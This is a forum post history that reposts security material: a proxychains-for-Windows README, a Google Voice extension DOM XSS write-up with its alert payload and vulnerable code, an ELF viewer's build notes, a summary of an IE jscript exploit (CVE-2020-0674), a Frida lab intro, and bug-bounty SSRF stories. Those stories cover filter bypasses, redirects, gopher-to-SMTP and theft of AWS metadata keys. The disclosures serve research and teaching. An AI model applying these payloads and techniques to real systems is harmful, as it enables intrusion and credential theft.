-
Posts
18794 -
Joined
-
Last visited
-
Days Won
742
Everything posted by Nytro
-
Proxychains.exe - Proxychains for Windows README README | 简体中文文档 Proxychains.exe is a proxifier for Win32(Windows) or Cygwin/Msys2 programs. It hijacks most of the Win32 or Cygwin programs' TCP connection, making them through one or more SOCKS5 proxy(ies). Proxychains.exe hooks network-related Ws2_32.dll Winsock functions in dynamically linked programs via injecting a DLL and redirects the connections through SOCKS5 proxy(ies). Proxychains.exe is a port or rewrite of proxychains4 or proxychains-ng to Win32 and Cygwin. It also uses uthash for some data structures and minhook for API hooking. Proxychains.exe is tested on Windows 10 x64 1909 (18363.418), Windows 7 x64 SP1, Windows XP x86 SP3 and Cygwin 64-bit 3.1.2. Target OS should have Visual C++ Redistributable for Visual Studio 2015 installed. WARNING: DNS LEAK IS INEVITABLE IN CURRENT VERSION. DO NOT USE IF YOU WANT ANONYMITY! WARNING: this program works only on dynamically linked programs. Also both proxychains.exe and the program to call must be the same platform and architecture (use proxychains_x86.exe to call x86 program, proxychains_x64.exe to call x64 program; use Cygwin builds to call Cygwin program). WARNING: this program is based on hacks and is at its early development stage. Any unexpected situation may happen during usage. The called program may crash, not work, produce unwanted results etc. Be careful when working with this tool. WARNING: this program can be used to circumvent censorship. doing so can be VERY DANGEROUS in certain countries. ALWAYS MAKE SURE THAT PROXYCHAINS.EXE WORKS AS EXPECTED BEFORE USING IT FOR ANYTHING SERIOUS. This involves both the program and the proxy that you're going to use. For example, you can connect to some "what is my ip" service like ifconfig.me to make sure that it's not using your real ip. ONLY USE PROXYCHAINS.EXE IF YOU KNOW WHAT YOU'RE DOING. THE AUTHORS AND MAINTAINERS OF PROXYCHAINS DO NOT TAKE ANY RESPONSIBILITY FOR ANY ABUSE OR MISUSE OF THIS SOFTWARE AND THE RESULTING CONSEQUENCES. Build First you need to clone this repository and run git submodule update --init --recursive in it to retrieve all submodules. Win32 Build Open proxychains.exe.sln with a recent version Visual Studio (tested with Visual Studio 2019) with platform toolset v141_xp on a 64-bit Windows. Build the whole solution and you will see DLL file and executable file generated under win32_output/. Cygwin/Msys2 Build Install Cygwin/Msys2 and various build tool packages (gcc, w32api-headers, w32api-runtime etc). Run bash, switch to cygwin_build / msys_build directory and run make. Install Copy proxychains*.exe, [cyg/msys-]proxychains_hook*.dll to some directory included in your PATH environment variable. You can rename the main executable (like proxychains_win32_x64.exe) to names you favor, like proxychains.exe. Last you need to create the needed configuration file in correct place. See "Configuration". Configuration Proxychains.exe looks for configuration in the following order: file listed in environment variable %PROXYCHAINS_CONF_FILE% or $PROXYCHAINS_CONF_FILE or provided as a -f argument $HOME/.proxychains/proxychains.conf (Cygwin) or %USERPROFILE%\.proxychains\proxychains.conf (Win32) (SYSCONFDIR)/proxychains.conf (Cygwin) or (User roaming dir)\Proxychains\proxychains.conf (Win32) /etc/proxychains.conf (Cygwin) or (Global programdata dir)\Proxychains\proxychains.conf (Win32) For options, see proxychains.conf. Usage Example proxychains ssh some-server proxychains "Some Path\firefox.exe" proxychains /bin/curl https://ifconfig.me Run proxychains -h for more command line argument options. How It Works Main program hooks CreateProcessW Win32 API call. Main program creates child process which is intended to be called. After creating process, hooked CreateProcessW injects the Hook DLL into child process. When child process gets injected, it hooks the Win32 API call below: CreateProcessW, so that every descendant process gets hooked; connect, WSAConnect and ConnectEx, so that TCP connections get hijacked; GetAddrInfoW series, so that Fake IP is used to trace hostnames you visited, allowing remote DNS resolving; etc. Main program does not exit, but serves as a named pipe server. Child process communicates with the main program to exchange data including logs, hostnames, etc. Main program does most of the bookkeeping of Fake IP and presence of descendant processes. When all descendant processes exit, main program exits. Main program terminates all descendant processes when it receives a SIGINT (Ctrl-C). About Cygwin/Msys2 and Busybox Cygwin is fully supported since 0.6.0! Switching the DLL injection technique from CreateRemoteThread() to modifying the target process' entry point, proxychains.exe now supports proxifying Cygwin/Msys2 process perfectly. (Even when you call them with Win32 version of proxychains.exe). See DevNotes. If you want to proxify MinGit busybox variant, replace its busybox.exe with this version modified by me. See DevNotes. To-do and Known Issues Add an option to totally prevent "DNS leak" ? (Do name lookup on SOCKS5 server only) Properly handle "fork-and-exit" child process ? (In this case the descendant processes' dns queries would never succeed) Remote DNS resolving based on UDP associate Hook sendto(), coping with applications which do TCP fast open Connection closure should be correctly handled in Ws2_32_LoopRecv and Ws2_32_LoopSend (fixed in 0.6.5) A large part of socks5 server name possibly lost when parsing configuration (fixed in 0.6.5) Correctly handle conf and hosts that start with BOM (fixed in 0.6.5) Detect .NET CLR programs that is AnyCPU&prefers 32-bit/targeted x86 /targeted x64. (These are "shimatta" programs, which must be injected by CreateRemoteThread()) (fixed in 0.6.2) ResumeThread() in case of error during injection (fixed in 0.6.1) Fix choco err_unmatched_machine (fixed in 0.6.1) Get rid of Offending&Matching host key confirmation when proxifying git/SSH, probably using a FQDN hash function (fixed in 0.6.0) Tell the user if command line is bad under Cygwin (fixed in 0.6.4) Inherit exit code of direct child (fixed in 0.6.4) Licensing This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License version 2 for more details. You should have received a copy of the GNU General Public License version 2 along with this program (COPYING). If not, see http://www.gnu.org/licenses/. Uthash https://github.com/troydhanson/uthash This program contains uthash as a git submodule, which is published under The 1-clause BSD License: Copyright (c) 2008-2018, Troy D. Hanson http://troydhanson.github.com/uthash/ All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. MinHook https://github.com/TsudaKageyu/minhook This program contains minhook as a git submodule, which is published under The 2-clause BSD License: MinHook - The Minimalistic API Hooking Library for x64/x86 Copyright (C) 2009-2017 Tsuda Kageyu. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Sursa: https://github.com/shunf4/proxychains-windows
-
DOM-Based XSS at accounts.google.com by Google Voice Extension. This universal DOM-based XSS was discovered accidentally, it is fortunate that the google ads' customer ID is the same format as American phone number format. I opened Gmail to check my inbox and the following popped up I rushed to report it to avoid dupe, without even checking what's going on, as a Stored XSS in Gmail triggered by google ads rules as the picture shows, but the reality was something else. Why did it work? Because two things: google voice extension was installed and this text '444-555-4455 <img src=x onerror=alert(1)>' was in the inbox page. after a couple of minutes, I realized that this XSS was triggered by Google Voice Extension, which could execute javascript anywhere and thus on accounts.google.com and facebook.com. I extract google voice source code to find out what is in the question. in the file contentscript.js, there was a function called Wg() which was responsible for the DOM XSS. function Wg(a) { for (var b = /(^|\s)((\+1\d{10})|((\+1[ \.])?\(?\d{3}\)?[ \-\.\/]{1,3}\d{3}[ \-\.]{1,2}\d{4}))(\s|$)/m, c = document.evaluate('.//text()[normalize-space(.) != ""]', a, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null), d = 0; d < c.snapshotLength; d++) { a = c.snapshotItem(d); var f = b.exec(a.textContent); if (f && f.length) { f = f[2]; var g = "gc-number-" + Ug, h = '<span id="' + g + '" class="gc-cs-link"title="Call with Google Voice">' + f + "</span>", k; if (k = a.parentNode && !(a.parentNode.nodeName in Og)) k = a.parentNode.className, k = "string" === typeof k && k.match(/\S+/g) || [], k = !Fa(k, "gc-cs-link"); if (k) try { if (!document.evaluate('ancestor-or-self::*[@googlevoice = "nolinks"]', a, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null) .snapshotLength) { if (0 == a.parentNode.childElementCount) { var w = a.parentNode.innerHTML, y = w.replace(f, h); a.parentNode.innerHTML = y } else { w = a.data; y = w.replace(f, h); var u = Qc("SPAN"); u.innerHTML = y; h = u; k = a; v(null != h && null != k, "goog.dom.insertSiblingAfter expects non-null arguments"); k.parentNode && k.parentNode.insertBefore(h, k.nextSibling); Vc(a) } var t = Ic(document, g); t && (Ug++, nc(t, "click", ma(Sg, t, f))) } } catch (E) {} } } } The function wasn't difficult to read, the developer was looking for a phone number in the body's elements content, grab it, create another span element with the grabbed phone number as its content so the user can click and call that number right from the web page. Let's break it down, from line 1 to line 9, it is looping through the body's elements' contents with document.evaluate, document.evaluate is a method makes it possible to search within the HTML and XML document, returns XPathResult object that represents the result and here it is meant to evaluate and grab all body's elements' contents, technically select all the texts nodes from the current node and assign it to the variable 'a', and this was the source, note here it was a DOM XPath-injection: (var b = /(^|\s)((\+1\d{10})|((\+1[ \.])?\(?\d{3}\)?[ \-\.\/]{1,3}\d{3}[ \-\.]{1,2}\d{4}))(\s|$)/m, c = document.evaluate('.//text()[normalize-space(.) != ""]', a, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null), d = 0; d < c.snapshotLength; d++) { a = c.snapshotItem(d); then executes a search (variable 'b' which is a regex for America phone number format) for a match in the returned result that is stored in variable 'a'. then if the match found assign it to variable 'f' then put it as span element's content in variable 'h'. Line 10 and 11 was checking the tag name that HTML element from which the variable 'f' got its content, is neither one of these tags SCRIPT, STYLE, HEAD, OBJECT, TEXTAREA, INPUT, SELECT, and A, nor it has the class attribute with the name of "gc-cs-link", this checking was mainly for two things: 1) prevent the extension from messing with DOM because it doesn't want to play with the content on an element such as SCRIPT, STYLE, and HEAD and doesn't achieve what it wants to do on elements like INPUT, SELECT, etc... 2) it stops the script from looping infinitely, because it doesn't want to create span element with phone number again if it already exists. From line 12 to line 27, there is an if condition, if variable k is true, means no element with a class attribute name of "gc-cs-link" has been found, it will execute a try statement, another an if condition inside the try statement check, if there is nowhere an element with a "googlevoice" attribute and "nolinks" as its value can be found, again using the document.evaluate, then nested if condition check if the variable 'a' has no child elements, and here is where the sink happens: w = a.parentNode.innerHTML, y = w.replace(f, h); a.parentNode.innerHTML = y this in case the variable 'a' has no child elements, othewise it will excute the next statment where it sinks again in the following line: k.parentNode && k.parentNode.insertBefore(h, k.nextSibling); The fix: I believe the developer was going to execute variable 'f' that was holding the value of phone number for example '+12223334455' on the sinks (innerHTML, insertBefore), instead for reason I couldn't understand he executes variable 'a' which was holding the payload ex: '444-555-4455 <img src=x onerror=alert(1)>' on the sinks, this XSS could be spared if he did not do so. Reward: $3,133.7 Sursa: http://www.missoumsai.com/google-accounts-xss.html
-
ELF file viewer/editor for Windows, Linux and MacOS. How to build on Linux Install Qt 5.12.8: https://github.com/horsicq/build_tools Clone project: git clone --recursive https://github.com/horsicq/XELFViewer.git Edit build_lin64.bat ( check QT_PATH variable) Run build_lin64.bat How to build on OSX Install Qt 5.12.8: https://github.com/horsicq/build_tools Clone project: git clone --recursive https://github.com/horsicq/XELFViewer.git Edit build_mac.bat ( check QT_PATH variable) Run build_mac.bat How to build on Windows(XP) Install Visual Studio 2013: https://github.com/horsicq/build_tools Install Qt 5.6.3 for VS2013: https://github.com/horsicq/build_tools Install 7-Zip: https://github.com/horsicq/build_tools Clone project: git clone --recursive https://github.com/horsicq/XELFViewer.git Edit build_winxp.bat ( check VS_PATH, SEVENZIP_PATH, QT_PATH variables) Run build_winxp.bat How to build on Windows(7-10) Install Visual Studio 2017: https://github.com/horsicq/build_tools Install Qt 5.12.8 for VS2017: https://github.com/horsicq/build_tools Install 7-Zip: https://github.com/horsicq/build_tools Clone project: git clone --recursive https://github.com/horsicq/XELFViewer.git Edit build_win32.bat ( check VS_PATH, SEVENZIP_PATH, QT_PATH variables) Run build_win32.bat Sursa: https://github.com/horsicq/XELFViewer
-
CVE-2020-0674 CVE-2020-0674 is a use-after-free vulnerability in the legacy jscript engine. It can be triggered in Internet Explorer. The exploit here is written by maxpl0it but the vulnerability itself was discovered by Qihoo 360 being used in the wild. This exploit simply pops calc. Exploit writeup coming soon. Vulnerability Overview The vulnerability exists in the Array sort function when using a comparator function. The two supplied arguments for the comparator function are not tracked by the Garbage Collector and thus will point to freed memory after the GC is called. Exploit Notes The exploit was written for Windows 7 specifically, but could probably be ported without too much hassle. This exploit was written for x64 instances of IE, therefore will run on (and has been tested on) the following browser configurations: IE 8 (x64 build) IE 9 (x64 build) IE 10 (Either with Enhanced Protected Mode enabled or TabProcGrowth enabled) IE 11 (Either with Enhanced Protected Mode enabled or TabProcGrowth enabled) It's worth noting that Enhanced Protected Mode on Windows 7 simply enables the x64 version of the browser process so it's not a sandbox escape so much as there not being any additional sandbox. Ironically since this exploit is for x64, EPM actually allows it to work. The exploit isn't made to entirely bypass EMET (Only a stack pivot detection bypass has really been implemented), however the final version (5.52) doesn't seem to trigger EAF+ when the exploit is run whereas 5.5 does (at least, on Windows 7 x64). So IE 11 in Enhanced Protected Mode with maximum EMET settings enabled allows the exploit. The exploit is heavily commented but in order to get a better understanding of how the exploit works and what it's doing at each stage, change var debug = false; to var debug = true; and either open the developer console to view the log or keep it closed and view the alert popups instead (which might be a little annoying). Sursa: https://github.com/maxpl0it/CVE-2020-0674-Exploit
-
Android Reversing for Examiners Preamble This lab was created by Mike Williamson (Magnet Forensics) and Chris Atha (NW3C). It was originally designed to be delivered live as a lab. With COVID-19, the lab was reworked to be delivered virtually, beginning with Magnet Virtual Summit in May 2020. This gitbook is available to all and we really hope you enjoy and have some takeaways from it. Many of the topics and processes introduced in this lab are complex. Our objective for the live delivery component was to get as much content as possible packed inside a 90 minute lab. To cover the inevitable explanatory shortfall, this gitbook provides a lot of accompanying documentation and guidance which you can go through at your convenience, should wish to delve deeper! Video Walkthroughs Some people learn better by seeing, so a number of walkthrough videos have been created to assist in processes not specifically covered in the lab. The videos will be referenced in the appropriate places in this documentation, but there is also a full playlist located here. Support Frida We wanted to include a section about how to support Frida if you find it useful! Ole Andre, the creator of Frida, pointed to this tweet and advises that the best thing you can do is check out products offered by NowSecure! Pretty small ask for how powerful this thing is - and how much work goes into keeping the project going! Legal The opinions and information expressed in this gitbook are those of the authors. They do not purport to reflect the opinions or views of Magnet Forensics or NW3C. NW3C is a trademark of NW3C, Inc. d/b/a the National White Collar Crime Center. The trademarks, logos, or screenshots referenced are the intellectual property of their respective owners. Sursa: https://summit-labs.frida.ninja/
-
Piercing the Veal: Short Stories to Read with Friends d0nut Follow Apr 27 · 16 min read Title respectfully inspired by Alyssa Herrera’s Piercing the Veil SSRF blog post It’s been over a year and a half since I’ve started my bug bounty journey as a hacker. With years of experience triaging reports and working in security, I’ve seen a plethora of bug types, attack vectors, and exploitation techniques. I’ve had such a healthy diversity in exposure to these different concepts that it’s quite honestly surprising that one particular bug class has captured my imagination so effortlessly and decisively as Server-Side Request Forgery has. Today, I want to share my love for SSRF by discussing what it is, why companies care about it, how I approach testing features I suspect may be vulnerable to SSRF, and lastly share a couple of short stories on SSRFs that I’ve found in my time hacking. Modern Web Applications The modern web application consists of a fair bit more than just a couple of php files and fastcgi. These increasingly complex stacks often consist of dozens upon dozens of services running in a production network, mostly isolated from the public internet. Each of these services, generally responsible for one or a few related tasks or models powering the web application, can be spun up and down to help deal with sudden changes in load. It’s an amazing feat that allows the modern web application to scale to millions and hundreds of millions of users. An example modern web application architecture In this model, attackers and users both start with the same level of privilege (unprivileged network position — left side of above image) which directly affects the exposed attack surface. The only service these actors can directly interact with (or attack) is the nginx instance with public and private IP addresses. It’s also worth pointing out that because the exposed nginx instance uses vHosts, external parties are also able to interact with the www, app, and link services, though not the machines directly. Regardless, attackers are unable to meaningfully control interactions with the IAM, Redis, Widget Service, and two MySQL instances. But imagine that this wasn’t true. Imagine, as an attacker, that you were able to talk to any of these services and systems directly. Perhaps, and is often the case, these internal services aren’t secured as well; priority to the security of these systems is yielded to that of the perimeter. It would be a field-day for any attacker. At this point, our story could diverge: we could talk about how differences in the interpretation of the HTTP standard between the vhost services and nginx could enable Request Smuggling vulnerabilities. We could also talk about how second-order SQLi can occur from data stored in one service and processed by another. We could even discuss the attacks against internal HTTP requests by injecting query parameter-breaking characters such as # or & to introduce new parameters or to truncate them instead. However, I’d like to discuss how SSRF fits into this picture. What is SSRF? SSRF, or Server-Side Request Forgery, is a vulnerability where an attacker is able to direct a system in a privileged network position to issue a request to another system with a privileged network position. Keep in mind the bold sections: there is definitely a need to support features where an attacker can direct a service in a privileged network position to make a request to a system in an unprivileged network position. A perfect example of this is a webhook feature as found on Github or Dropbox. Being able to point a webhook at your burp collaborator instance is not a vulnerability. Impactful SSRF on left; not right Of course, there are exceptions to every rule. I use this more strict definition above to help direct the most common instances of SSRF and faux SSRF to their respective determinations: valid or invalid. Case in point: I did once encounter a situation where being able to change the address to an attacker controlled machine without a privileged network position allowed me to read the Authorization header and steal credentials used on an internal api call… so take this with a grain of salt. The typical feature or place to find SSRF is where some parameter contains a url or domain as the value. Seeing a POST request like the following POST /fetchPage HTTP/1.1 Host: app.example.com ... Content-Type: application/x-www-form-urlencodedurl=http%3A%2F%2Ffoobar.com%2fendpoint is a pretty clear sign that this is the kind of feature that may introduce an SSRF vulnerability. There are some other types of features, like HTML to PDF generators, where a headless browser or similar is used in a privileged network position to generate a preview or PDF. If you’re curious about these kinds of attack vectors, go read the slides that Daeken and Nahamsec put together for DEFCON. In fact, anywhere where you may be able to control an address to another system is a place where you should try testing for SSRF. Technically, even a HOST header could be a vulnerable parameter. If It Walks Like a Duck and It Talks Like a Duck.. I didn’t originally intend for this blog post to be a “how to test for SSRF” guide (there are plenty of those), but when I was drawing the outline for the material I felt that I should at least cover some of the behaviors or characteristics that I look for when testing for SSRF. I’m generally interested in the following questions: Can I read the response? Am I able to read the response? If not, is there any additional information given to me based on the availability of the receiving system? If the port isn’t open, does an error get returned? If the system doesn’t speak HTTP but is receiving traffic, what happens? If I can read the response then proving impact is a breeze: we just need to identify an internal service that responds to whatever protocols we have access to and read a response from it. If we can’t read the response, we might have to come up with interesting side channels like different error messages or see if we can blindly coerce an internal service to issue a request to the internet. Where are we? Is the vulnerable service running on some Infrastructure as a Service (IaaS) platform (like AWS or GCP) or are we on something less sophisticated or more custom? This lets me know if I’m able to reach a metadata service and may clue me in to what kinds of systems may be running in the internal network. Can I redirect? This is pretty straightforward. What are the rules for redirecting? Are they always rejected? Are they always processed? Or is there some nuance in between? Redirects are a super common method of bypassing mitigations for SSRF. Occasionally web applications will check if the initial domain resolves to an RFC1918 address and error out if so. These kinds of checks are usually only performed on the initial request and a 302 redirect could be leveraged to tell the client to pivot to the internal network. Beware proxies in front of these internal HTTP clients, though, as they can properly discern if a request should be forwarded to its destination. What protocols does the client support? HTTP/HTTPS only? FTP? Gopher?? Supporting additional protocols (especially Gopher) will increase the level of impact and options for exploitation available to you. Remember to think creatively about how you can demonstrate that you’re able to successfully interact with internal systems. This is much easier when you can read the response, of course, but if you’re able to provide that kind of information via a sidechannel like an error when ports are filtered/blocked or if you’re able to get that service to interact with the outside world as a result of your privileged message then you’re going to be more successful in proving the presence of SSRF. For inspiration, one of my favorite methods of demonstrating that I have an SSRF is leveraging a localhost smtp services to show that I’m able to trigger the system to send me an email. This is a method that I’ve used twice now in HackerOne SSRF reports. Lastly, moving away from HTTP and HTTPS protocols can let you bypass the proxies mentioned earlier. Oftentimes these proxies only handle HTTP or HTTPS traffic, so being able to speak a protocol like Gopher can allow you to bypass the internal proxy all-together. SSRF and Where to Find Them As stated before, SSRF can show up anywhere a system addressable string shows up (IP, domain name, email address, etc). While I could start enumerating every possible features that could become an SSRF (and still miss a ton of possible examples), I think a better way to learn is reading stories about ones others have found and try to extrapolate other similar attack vectors. Story 1 — Duck Duck Gopher (This report is public so go read about it here) This story starts in the middle of October of 2018: the early part of my bug hunting career. I was hacking on a the advice of a friend on this new private program invite I received for Nintendo (it’s public now). I spent a number of hours hacking trying to find anything remotely interesting but struggling to make progress. I ended up giving up after an unsuccessful couple of hours. I was going to take one last brief look at my HTTP History in Burp Suite before closing it down and going to bed. That’s when I noticed a single request fly by that just seemed too good to be true. At this time I had DuckDuckGo configured as my default search engine in Chrome (though, admittedly, I pretty much always opened Google instead; so much for privacy ¯\_(ツ)_/¯). At one point I had accidentally submitted a search query to DuckDuckGo and burp had intercepted all of the requests that page made. The one that caught my eye was a request to https://duckduckgo.com/iu. This request had a query parameter named url that appeared to return a page response whenever the parameter contained a url with a domain name of yimg.com Successful request However, when you try another domain like google.com you’d encounter an error indicating that they’re doing some sort of filtering to reject requests to other domains. Notice the 403 Forbidden in this response as opposed to the 200 OK above. Unsuccessful request On a hunch, I decided to see if this service was actually parsing the url for the whitelist or if they were just using a string.contains fueled check. Sure enough, this was all I needed to bypass the filter and begin investigating this for possible SSRF behavior. Bypassing a string.contains filter by appending the domain to a fake query parameter As mentioned above, some of the things I want to investigate are the client’s ability to redirect and to identify what other protocols it supports if possible. Upon testing for redirect behavior, I did notice that redirects were respected. I pointed DuckDuckGo at an endpoint that would respond with a 302 redirect to a burp collaborator instance and confirmed that the redirect worked. Afterwords, I checked to see if the gopher protocol was supported by using it in the Location header in the redirect. The gopher protocol would allow me to talk to many more services internally so it was useful to learn if this client would support it (and increase the severity of this finding). I was able to perform a port scan using this SSRF and discovered a number of services running on localhost. One of these services, on port 6868, was Redis which was actually returning some data when hit with HTTP. The json that was returned mentioned a domain that only seemed resolvable internally. Now, with this SSRF, I would be able to port scan that service and begin identifying services I could communicate with. Here’s a diagram to help demonstrate where we’re at with this attack. SSRF against duckduckgo Eventually, I noticed that port 8091 was open on cache-services.duckduckgo.com and was returning a ton of data. I had begun my report with DuckDuckGo a bit earlier than this but wanted to see what else I could do to increase the impact (and learn). Around this point, I had stopped hacking on the target and called it a day. Aftermath Unfortunately, DuckDuckGo doesn’t pay for bugs, but they do offer some swag. I ended up getting a DuckDuckGo t-shirt, a really great story, and a public disclosure that I’m quite proud of. Story 2— In ursmtp I was invited to a private program that I didn’t have a lot of hope for. It was one of those services that felt like it could be replaced by any other CRUD app on the market. It didn’t really offer much in the way of interesting behavior as far as I could tell and I was getting quite bored of it. While the scope did have a *. domain allowed, I wasn’t finding much interesting on it. Eventually, I found a feature that allowed a user to update the information on their account. One of the fields you could fill out was your personal website address (similar to the one on twitter). An interesting behavior was that if the website didn’t exist or was inaccessible for some reason, this field would become yellow. If the site did exist, the field would turn green. Site doesn’t exist vs site does exist This feedback mechanism made me realize that this was more than a simple CRUD app and this service must be issuing an HTTP request to the specified address. I put a Burp collaborator address in to confirm and sure enough I saw a request come in. I was able to use the feedback mechanism to perform a local port scan and found a number of services online: SSH, SMTP, DNS, and a few others that I couldn’t identify by port. To get to work on proving the impact here, I ended up performing a similar set of tests as I did with DuckDuckGo: I checked redirect and gopher behavior and was lucky enough to find that both were available. Now that I had gopher available, I was able to prove some impact by crafting an SMTP message in gopher and firing it at localhost:25 . Sure enough, moments later, a new email showed up in my inbox. Aftermath I was awarded $800 for this finding and received a rating of high for this finding. Story 3— CMSSRF I was invited to a recently opened private program. If you’ve never been invited to a program that just opened up, then you may not be aware that you’ll get this sense of “blood in the water”: you know that all of your fellow hackers and friends who also got an invite are going to start tearing this program up in the next couple of hours and if you don’t want to miss out on any low hanging fruit, you need to be quick. I started my process off by deciding to not look at the core domain but jump to interesting subdomains. I ran sublist3r and discovered a couple of subdomains that mentioned cms in their domain name. In my experience, cms services tend to have many problems and that this might be a great place to take a look. I didn’t find much on the home page of this asset so I ran dirsearch to see if there was anything potentially interesting hidden on the asset. Sure enough, after about 15 minutes of pounding the asset I found an endpoint that mentioned something about user management that would 302 to another endpoint. That endpoint had a login page for some management system. What’s more, there were some javascript files that referenced an API on this asset. After discovering that the qa subdomain of this asset had unobfuscated javascript, I was able to figured out how to call the api and what calls I had available to me. One of the calls was named createWebRequest and took one url parameter in a POST body. By this point in my hacking I already knew that this asset was running on AWS so I wasted no time in trying to issue a request to this api endpoint for the AWS metadata ip address. Sure enough, we got a hit. Response from createwebrequest api When I tried the AWS keys in the aws cli client, I found that I had an absurd level of access to dozens of S3 buckets, dozens more EC2 instances, Redis, etc. It was a critical in every sense of the word. Aftermath I was paid $3,000 (max payout) and the report was marked as a critical. Story 4— Authenticated Request This is the story of my most recent SSRF and, in a way, has been the most entertaining SSRF I’ve ever found. I started hacking on this new private program I was invited to. I started to look at the core asset for issues. I found a couple stored XSS at this point and was in a really great mood. I was about to wrap up shop when I took a look at the burp collaborator instance that I had left open. What I saw would surprise me. As an aside: one of the things I do when I’m signing up for services that I’m going to hack on is that I use a burp collaborator instance to review email. It’s a good way for me to not pollute the email accounts I have with annoying advertisements after I’ve finished hacking on a service and it also lets me see if anything interesting is happening after the fact. Anyway, when I looked at burp collaborator, I noticed that it had received an HTTP request with a User-Agent that mentioned the service that I was hacking on. I thought to myself, “Did I just accidentally discover a feature that could be vulnerable to SSRF?!”. I set out to figure out how to trigger this again. Well, putting the timeline of requests together clearly explained what happened. I had just signed up for this service with an email like user@abc123.burpcollaborator.net and seconds later received both an SMTP message (email) and HTTP request for the homepage. I signed up again with an email address like user@1.2.3.4.xip.io to see if I could check if 302 behavior was respected. After receiving the forwarded request in my burp collaborator instance, I wanted to confirm that gopher worked as I had noticed that this request was fronted by Squid Proxy (which would probably block my attempts to access the internal network). Similar to the previous stories, I checked the gopher protocol on a 302 redirect and noted that I was able to use it to interact with internal services. Unfortunately, there was no feedback of any kind so I wouldn’t be able to perform a port scan here. I decided to try for a localhost smtp message anyway to see if I could get lucky. Sure enough, after crafting a message and performing the attack, I received a new email in my inbox proving that this SSRF was real and dangerous. Aftermath Well, unlike the previous stories, I have yet to get paid for this finding. The good news is that my report has been triaged as a high so I’m just waiting for a final determination on the payout. I’ll probably post about it on my Twitter (which you should go follow if you haven’t yet). Story 5 — Owning the Clout I wish I could say that this story was inspired by Nahamsec and Daeken’s SSRF talk at Defcon but I had found this roughly a year prior to their talk being released. I was hacking on a new program for a company in the financial space. It was a product I had never seen (or heard of) before and was heavily involved in analytics. One of the features allowed you to upload images and store them for use in a couple of others features in the product. Of course, one of the tests that I want to perform here is “Can I upload HTML” and if so, “What happens if that HTML fetches external resources”? I tried uploading an HTML file but found that the service rejected the upload. I tried to see if I could lie about the content type in the multipart upload by changing it to say image/jpeg and sure enough it uploaded the document fine. After making a request to this other endpoint that gave you updates on the status of the document, it would trigger an internal renderer/browser to issue a request to attacker.com. In this case, I would’ve done more to prove impact, but it was pretty clear in this case that this was super unintended and I would’ve been able to access an internal system if I had an address to hit. I ended up reporting and getting a bounty. Aftermath I was compensated $1,000 for this finding and it was rated a medium. In retrospect, I should’ve done more to see if I could prove additional impact. I feel like that would’ve allowed me to be compensated much more highly than I was. Wrap Up SSRF is my favorite bug class due to its simplicity in execution, difficulty in mitigation, and the crazy number of ways that SSRF manifests (I’ve even heard of methods to use FTP to trigger it). Having the ability to interact with private, internal networks is incredibly fascinating to me and I hope that after reading this post and the stories within, you’ll feel more empowered to find and explore the inaccessible networks powering the modern world. Shout-outs to Alyssa Herrera whose Piercing the Veil post inspired me to even look for and become fascinated with SSRF in the first place. 461 Thanks to Hon Kwok. Sursa: https://medium.com/@d0nut/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5
-
